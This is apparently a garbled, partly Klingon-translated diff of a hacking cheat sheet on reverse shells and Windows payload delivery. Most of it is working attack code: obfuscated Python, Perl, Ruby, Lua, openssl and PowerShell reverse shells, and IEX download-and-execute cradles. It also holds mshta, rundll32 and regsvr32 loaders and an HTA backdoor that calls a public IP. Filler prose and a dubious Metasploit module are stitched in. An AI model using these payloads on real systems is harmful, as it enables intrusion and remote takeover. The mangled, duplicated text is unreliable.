(len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
``` ```
Perl is a high-level programming language that is commonly used for scripting and automation tasks. It is known for its powerful text processing capabilities and its ability to work well with other programming languages. Perl scripts can be executed on various operating systems, including Windows.
## Perl Perl is often used by hackers for various purposes, such as writing exploit scripts or automating tasks during a penetration test. It provides a wide range of built-in functions and modules that can be leveraged for hacking activities.
When using Perl for hacking, it is important to have a good understanding of the language and its syntax. This includes knowledge of variables, control structures, regular expressions, and file handling. Additionally, familiarity with Perl modules that are commonly used in hacking, such as Net::FTP or Net::SSH, can be beneficial.
Perl can be installed on Windows by downloading and running the installer from the official Perl website. Once installed, Perl scripts can be executed from the command line by typing "perl" followed by the script name.
When writing Perl scripts for hacking purposes, it is important to follow best practices to ensure the code is secure and efficient. This includes sanitizing user input, properly handling errors, and using encryption when necessary.
Overall, Perl is a versatile programming language that can be a valuable tool for hackers. Its extensive functionality and cross-platform compatibility make it a popular choice for scripting and automation in the hacking community.
```bash ```bash
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
``` ```
### Introduction
## Ruby Ruby is a dynamic, object-oriented programming language that is known for its simplicity and readability. It was created in the mid-1990s by Yukihiro Matsumoto, also known as Matz. Ruby has gained popularity among developers due to its elegant syntax and powerful features.
### Features
Ruby offers a wide range of features that make it a versatile language for various applications. Some of the key features of Ruby include:
1. **Dynamic Typing**: Ruby is dynamically typed, which means that variable types are determined at runtime. This allows for more flexibility and easier code maintenance.
2. **Object-Oriented**: Ruby is a fully object-oriented language, where everything is an object. This allows for the use of classes, inheritance, and polymorphism, making it easier to organize and structure code.
3. **Garbage Collection**: Ruby has built-in garbage collection, which automatically manages memory allocation and deallocation. This helps developers focus on writing code without worrying about memory management.
4. **Blocks and Procs**: Ruby supports blocks and procs, which are anonymous functions that can be passed as arguments to methods. This allows for more concise and expressive code.
5. **Metaprogramming**: Ruby has powerful metaprogramming capabilities, allowing developers to modify and extend the language itself. This enables the creation of domain-specific languages and flexible frameworks.
### Syntax
Ruby has a clean and readable syntax that is designed to be easy to understand and write. Here are some examples of Ruby syntax:
```ruby
# Variables
name = "John"
age = 25
# Conditionals
if age >= 18
puts "You are an adult"
else
puts "You are a minor"
end
# Loops
for i in 1..5
puts i
end
# Methods
def greet(name)
puts "Hello, #{name}!"
end
greet("Alice")
```
### Resources
There are many resources available for learning Ruby and improving your skills. Here are some recommended resources:
- [Ruby Documentation](https://ruby-doc.org/): The official documentation for Ruby, which provides detailed information about the language and its standard library.
- [RubyGems](https://rubygems.org/): A package manager for Ruby that allows you to easily install and manage libraries and frameworks.
- [Ruby Toolbox](https://www.ruby-toolbox.com/): A website that provides a curated list of Ruby libraries and tools, categorized by functionality.
- [Ruby on Rails](https://rubyonrails.org/): A popular web application framework built with Ruby. It provides a set of conventions and tools for building robust and scalable web applications.
- [RubyMine](https://www.jetbrains.com/ruby/): An integrated development environment (IDE) specifically designed for Ruby development. It offers advanced features such as code completion, debugging, and refactoring tools.
### Conclusion
Ruby is a powerful and expressive programming language that offers a wide range of features and a clean syntax. Whether you are a beginner or an experienced developer, learning Ruby can greatly enhance your programming skills and productivity.
```bash ```bash
#Windows #Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
``` ```
### Introduction
## Lua Lua is a lightweight, high-level programming language designed primarily for embedded systems and scripting. It is often used as a scripting language in video games and other applications that require customizable behavior. Lua is known for its simplicity, efficiency, and ease of integration with other languages.
### Features
- **Lightweight**: Lua has a small footprint and minimal resource requirements, making it suitable for use in resource-constrained environments.
- **High-level**: Lua provides a simple and expressive syntax that is easy to read and write.
- **Embeddable**: Lua can be easily embedded into other applications, allowing developers to extend the functionality of their software.
- **Dynamic typing**: Lua uses dynamic typing, which means that variables do not have a fixed type and can be assigned values of different types at runtime.
- **Garbage collection**: Lua has automatic memory management through garbage collection, which helps developers avoid memory leaks and other memory-related issues.
- **Extensibility**: Lua can be extended with C/C++ code, allowing developers to leverage existing libraries and functionality.
- **Portability**: Lua is written in ANSI C and can be compiled and run on a wide range of platforms, including Windows, macOS, Linux, and various embedded systems.
### Usage
Lua can be used in a variety of ways, including:
- **Scripting**: Lua is often used as a scripting language in video games, allowing developers to define game logic and behavior in a flexible and customizable way.
- **Embedded systems**: Lua's small footprint and low resource requirements make it suitable for use in embedded systems, such as IoT devices and microcontrollers.
- **Extension language**: Lua can be embedded into other applications as an extension language, allowing developers to add scripting capabilities to their software.
- **Prototyping**: Lua's simplicity and ease of use make it a popular choice for rapid prototyping and experimentation.
### Conclusion
Lua is a versatile and lightweight programming language that is well-suited for embedded systems, scripting, and extension purposes. Its simplicity, efficiency, and ease of integration make it a popular choice among developers. Whether you are developing a video game, an IoT device, or a software application, Lua can be a valuable tool in your toolkit.
```bash ```bash
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
``` ```
## OpenSSH ## OpenSSH
Attacker (Kali) Attacker (Kali)
```bash ```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
``` ```
# Windows Shells
Victim ## Introduction
In the context of hacking, a shell refers to a command-line interface that allows an attacker to interact with a compromised system. In this section, we will explore various methods to obtain and maintain a shell on a Windows machine.
## Reverse Shells
A reverse shell is a technique where the attacker sets up a listener on their machine and the compromised system connects back to it. This allows the attacker to gain remote access to the victim's machine.
### Netcat
Netcat is a versatile networking utility that can be used to create reverse shells. It is available for both Windows and Linux systems.
To create a reverse shell using Netcat on Windows, follow these steps:
1. Set up a listener on your machine: `nc -lvp <port>`
2. Execute the following command on the victim's machine: `nc <attacker_ip> <port> -e cmd.exe`
### PowerShell
PowerShell is a powerful scripting language that is built into Windows. It can be used to create reverse shells as well.
To create a reverse shell using PowerShell, follow these steps:
1. Set up a listener on your machine: `nc -lvp <port>`
2. Execute the following command on the victim's machine: `powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker_ip>', <port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`
## Web Shells
Web shells are scripts or programs that are uploaded to a compromised web server. They provide a web-based interface for an attacker to execute commands on the server.
### PHP Shell
PHP shells are one of the most common types of web shells. They are written in PHP and can be uploaded to a web server via various methods, such as file upload vulnerabilities or command injection.
To use a PHP shell, follow these steps:
1. Upload the PHP shell to the target web server.
2. Access the PHP shell through a web browser.
3. Use the provided interface to execute commands on the server.
### ASPX Shell
ASPX shells are web shells written in ASP.NET. They can be uploaded to a web server that supports ASP.NET applications.
To use an ASPX shell, follow these steps:
1. Upload the ASPX shell to the target web server.
2. Access the ASPX shell through a web browser.
3. Use the provided interface to execute commands on the server.
## Conclusion
Obtaining and maintaining a shell on a Windows machine is a crucial step in the hacking process. Reverse shells and web shells are powerful techniques that allow attackers to gain remote access and execute commands on compromised systems. It is important for both attackers and defenders to understand these methods in order to protect against them.
```bash ```bash
#Linux #Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2> openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
@ -96,38 +272,72 @@ openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_clien
#Windows #Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2> openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
``` ```
## Powershell ## Powershell
### Introduction
Powershell is a powerful scripting language and automation framework developed by Microsoft. It is designed specifically for system administration and task automation on Windows operating systems. With its extensive set of commands and features, Powershell provides a versatile environment for managing and controlling Windows systems.
### Features
Powershell offers several key features that make it a popular choice among system administrators and hackers:
- **Command-line interface**: Powershell provides a command-line interface (CLI) that allows users to interact with the operating system and execute commands. This makes it easy to perform various tasks and automate repetitive actions.
- **Scripting language**: Powershell is a full-fledged scripting language that supports variables, loops, conditionals, and other programming constructs. This allows users to write complex scripts to automate tasks and perform system administration tasks.
- **Object-oriented**: Powershell treats everything as an object, including files, processes, and registry keys. This object-oriented approach makes it easy to manipulate and manage system resources.
- **Integration with .NET**: Powershell is built on top of the .NET framework, which provides access to a wide range of libraries and APIs. This allows users to leverage the power of .NET to perform advanced tasks and interact with external systems.
### Basic Usage
To start Powershell, open a command prompt and type `powershell`. This will launch the Powershell CLI, where you can start executing commands and running scripts.
Here are some basic commands to get you started:
- `Get-Process`: Lists all running processes on the system.
- `Get-Service`: Lists all installed services on the system.
- `Get-ChildItem`: Lists all files and directories in the current directory.
- `Set-ExecutionPolicy`: Sets the execution policy for Powershell scripts.
- `Invoke-Expression`: Executes a string as a command.
### Advanced Usage
Powershell provides a wide range of advanced features and capabilities. Here are some examples:
- **Remote administration**: Powershell can be used to remotely manage and administer Windows systems. It supports remote execution of commands and scripts, allowing administrators to perform tasks on multiple machines simultaneously.
- **Script execution**: Powershell scripts can be executed in various ways, including running them directly from the command line, scheduling them to run at specific times, or embedding them in other scripts or applications.
- **Module system**: Powershell supports the use of modules, which are collections of functions and scripts that can be imported and used in other scripts. This allows users to extend the functionality of Powershell and reuse code.
- **PowerShell Gallery**: The PowerShell Gallery is a repository of Powershell modules and scripts that can be downloaded and used by the community. It provides a convenient way to discover and share Powershell resources.
### Conclusion
Powershell is a versatile and powerful tool for system administration and automation on Windows systems. Its extensive set of commands and features make it a valuable asset for both system administrators and hackers. By mastering Powershell, you can streamline your workflow, automate repetitive tasks, and gain greater control over Windows systems.
```bash ```bash
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')" powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')" Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
``` ```
**powershell.exe** jolchugh network call yIngu'\
Process performing network call: **powershell.exe**\ Payload written on disk: **NO** (_procmon jatlhlaHbe'chugh yIngu'!_)
Payload written on disk: **NO** (_at least nowhere I could find using procmon !_)
```bash ```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1 powershell -exec bypass -f \\webdavserver\folder\payload.ps1
``` ```
**svchost.exe** jatlhpu' network call yIngu'\
Process performing network call: **svchost.exe**\ **WebDAV client local cache** DIvI' yIghItlhpu' payload
Payload written on disk: **WebDAV client local cache**
**One liner:**
```bash ```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
``` ```
**Get more info about different Powershell Shells at the end of this document** **Get more info about different Powershell Shells at the end of this document**
## Mshta ## Mshta
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")")) mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
``` ```
@ -139,26 +349,23 @@ mshta http://webserver/payload.hta
```bash ```bash
mshta \\webdavserver\folder\payload.hta mshta \\webdavserver\folder\payload.hta
``` ```
#### **Example of hta-psh reverse shell (use hta to download and execute PS backdoor)** #### **Example of hta-psh reverse shell (use hta to download and execute PS backdoor)**
#### **hta-psh reverse shell jatlh (hta vItlhutlh je PS backdoor download je execute)**
```xml ```xml
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt> <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
``` ```
**tlhIngan Hol:**
**You can download & execute very easily a Koadic zombie using the stager hta** **jIyItlhutlh:**
**vaj:**
#### hta example [**ghaH**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
[**From here**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)
```xml ```xml
<html> <html>
<head> <head>
<HTA:APPLICATION ID="HelloExample"> <HTA:APPLICATION ID="HelloExample">
<script language="jscript"> <script language="jscript">
var c = "cmd.exe /c calc.exe"; var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c); new ActiveXObject('WScript.Shell').Run(c);
</script> </script>
</head> </head>
<body> <body>
@ -166,13 +373,9 @@ mshta \\webdavserver\folder\payload.hta
</body> </body>
</html> </html>
``` ```
#### **mshta - sct** #### **mshta - sct**
[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) [**ghItlh**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml ```xml
<?XML version="1.0"?> <?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -183,15 +386,43 @@ mshta \\webdavserver\folder\payload.hta
</public> </public>
<script language="JScript"> <script language="JScript">
<![CDATA[ <![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> ]]>
</script> </script>
</scriptlet> </scriptlet>
``` ```
#### **Mshta - Metasploit** #### **Mshta - Metasploit**
##### **Description**
The `mshta` module in Metasploit Framework is used to exploit the Windows `mshta.exe` utility. This utility is responsible for executing HTML applications (HTAs) on Windows systems. By exploiting `mshta.exe`, an attacker can execute arbitrary code on the target system.
##### **Usage**
To use the `mshta` module, follow these steps:
1. Set the `RHOST` option to the IP address of the target system.
2. Set the `PAYLOAD` option to the desired payload.
3. Set the `LHOST` option to the IP address of the attacking machine.
4. Run the exploit using the `exploit` command.
##### **Example**
```
msf5 > use exploit/windows/browser/mshta
msf5 exploit(windows/browser/mshta) > set RHOST 192.168.1.10
msf5 exploit(windows/browser/mshta) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(windows/browser/mshta) > set LHOST 192.168.1.20
msf5 exploit(windows/browser/mshta) > exploit
```
##### **References**
- [Metasploit Unleashed - Mshta](https://www.metasploitunleashed.org/)
##### **Author**
- [@harmj0y](https://twitter.com/harmj0y)
```bash ```bash
use exploit/windows/misc/hta_server use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
@ -202,18 +433,16 @@ msf exploit(windows/misc/hta_server) > exploit
```bash ```bash
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
``` ```
**QaH Detected by defender**
**Detected by defender**
## **Rundll32** ## **Rundll32**
[**Dll hello world example**](https://github.com/carterjones/hello-world-dll) [**Dll ghuy'cha' example**](https://github.com/carterjones/hello-world-dll)
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
* [vaj](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint rundll32 \\webdavserver\folder\payload.dll,entrypoint
``` ```
@ -221,13 +450,11 @@ rundll32 \\webdavserver\folder\payload.dll,entrypoint
```bash ```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close(); rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
``` ```
**ghItlh by defender**
**Detected by defender**
**Rundll32 - sct** **Rundll32 - sct**
[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17) [**ghItlh**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml ```xml
<?XML version="1.0"?> <?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -237,22 +464,47 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http
</public> </public>
<script language="JScript"> <script language="JScript">
<![CDATA[ <![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> ]]>
</script> </script>
</scriptlet> </scriptlet>
``` ```
#### **Rundll32 - Metasploit** #### **Rundll32 - Metasploit**
Rundll32 is a Windows utility that allows the execution of DLL files. Metasploit is a popular framework used for penetration testing and exploiting vulnerabilities. By leveraging the Rundll32 utility in combination with Metasploit, an attacker can execute malicious code on a target system.
To use Rundll32 with Metasploit, follow these steps:
1. Generate a payload using Metasploit's payload generator.
2. Save the payload as a DLL file.
3. Transfer the DLL file to the target system.
4. Use Rundll32 to execute the DLL file on the target system.
The following command can be used to execute the DLL file using Rundll32:
```
rundll32.exe <path_to_dll_file>,<entry_point_function>
```
Replace `<path_to_dll_file>` with the path to the DLL file on the target system, and `<entry_point_function>` with the name of the function to be executed within the DLL.
By exploiting vulnerabilities and using Rundll32 with Metasploit, an attacker can gain unauthorized access to a target system and perform various malicious activities. It is important to note that these techniques should only be used for ethical purposes, such as penetration testing, and with proper authorization.
```bash ```bash
use windows/smb/smb_delivery use windows/smb/smb_delivery
run run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0 #You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
``` ```
**Rundll32 - Koadic** **Rundll32 - Koadic**
Rundll32 is a Windows utility that allows the execution of DLL files. It can be used by hackers to load malicious DLLs and execute their code. One popular tool that leverages Rundll32 for hacking purposes is Koadic.
Koadic is a post-exploitation RAT (Remote Access Trojan) that provides a command-and-control interface to interact with compromised Windows systems. It uses Rundll32 to load its DLL payload into memory and execute it.
To use Koadic, the attacker first needs to gain access to the target system. This can be achieved through various means, such as exploiting vulnerabilities, social engineering, or brute-forcing credentials. Once inside, the attacker can use Koadic to perform various malicious activities, such as stealing sensitive information, executing commands, or even taking full control of the compromised system.
Koadic provides a wide range of features and functionalities, including the ability to bypass antivirus detection, escalate privileges, and maintain persistence on the compromised system. It also supports multiple communication channels, such as HTTP, DNS, and ICMP, to establish communication with the attacker's command-and-control server.
It is important to note that the use of Rundll32 and Koadic for malicious purposes is illegal and unethical. This information is provided for educational purposes only, to raise awareness about potential security risks and help organizations protect their systems from such attacks.
```bash ```bash
use stager/js/rundll32_js use stager/js/rundll32_js
set SRVHOST 192.168.1.107 set SRVHOST 192.168.1.107
@ -261,12 +513,13 @@ run
#Koadic will tell you what you need to execute inside the victim, it will be something like: #Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close(); rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
``` ```
## Regsvr32 ## Regsvr32
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
### tlhIngan Hol
* [ghItlh](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash ```bash
regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
``` ```
@ -274,34 +527,28 @@ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
``` ```
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
``` ```
**Qapla'!**
**Detected by defender**
#### Regsvr32 -sct #### Regsvr32 -sct
[**From here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) [**ghItlh**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
```markup ```markup
<?XML version="1.0"?> <?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll --> <!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll --> <!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet> <scriptlet>
<registration <registration
progid="PoC" progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" > classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript"> <script language="JScript">
<![CDATA[ <![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]> ]]>
</script> </script>
</registration> </registration>
</scriptlet> </scriptlet>
``` ```
#### **Regsvr32 - Metasploit** #### **Regsvr32 - Metasploit**
```bash ```bash
use multi/script/web_delivery use multi/script/web_delivery
set target 3 set target 3
@ -310,59 +557,76 @@ set lhost 10.2.0.5
run run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll #You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
``` ```
**nuqneH:**
* [ghap 'ej execute Koadic zombie vItlhutlhlaH regsvr stager](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
**You can download & execute very easily a Koadic zombie using the stager regsvr** Certutil:
* [vaj 'ej](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
## Certutil
* [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
Download a B64dll, decode it and execute it.
B64dll download, decode, 'ej execute.
```bash ```bash
